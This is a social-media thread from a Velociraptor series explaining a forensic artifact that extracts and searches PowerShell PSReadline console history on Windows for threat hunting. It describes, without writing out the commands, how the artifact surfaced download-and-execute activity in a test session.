🦖Day 78 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.System\.PSReadline
Author: @mgreen27
Link: https://docs.velociraptor.app/artifact_references/pages/windows.system.powershell.psreadline/
----
Adversaries may abuse PowerShell commands and scripts for execution.
In fact, PowerShell is commonly used by attackers across all stages of the attack lifecycle.
They can use PowerShell to perform a number of actions, including discovery of information and execution of code.
----
This artifact will search and extract lines from PSReadline history file.
The PSReadline module is responsible for command history and from Powershell 5 on Windows 10 default configuration saves a copy of the console history to disk.
----
The following parameters are available for use with this artifact:
'SearchStrings' - regex search over a PSReadline line
'StringWhiteList' - regex whitelist for results
'UserRegex' - regex search on username
'UploadFiles' - upload in-scope ConsoleHost_history.txt files
----
Here (image), we can see multiple attempts to download and execute a .ps1 file using 'Net.WebClient' through PowerShell.
Our view into the source of 'Default_File_Path\.ps1' and what it does is somewhat hindered, but we can see that the bit.\ly URL contains the text 'L3g1tCrad1e'.
----
If we were to look at what originally happened during the PowerShell session, we would see that in each instance, the Default_File_Path.ps1 file was downloaded and executed 👀
----
These commands were not necessarily malicious, but used for illustrative purposes. If you would like to test these commands for yourself, check out the Atomic Red Team test using the link below!
----
Overall, this artifact includes the following information about the PowerShell console history file:
- Last modified time and other timestamps
- Line number
- Line (commands that were run)
- User
- Path to the PowerShell console history file
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the MITRE ATT&CK page for 'Command and Scripting Interpreter: PowerShell' below!
https://attack.mitre.org/techniques/T1059/001/
#velociraptor #artifactsofautumn #dfir #forensics #infosec #windows #t1509 #threathunting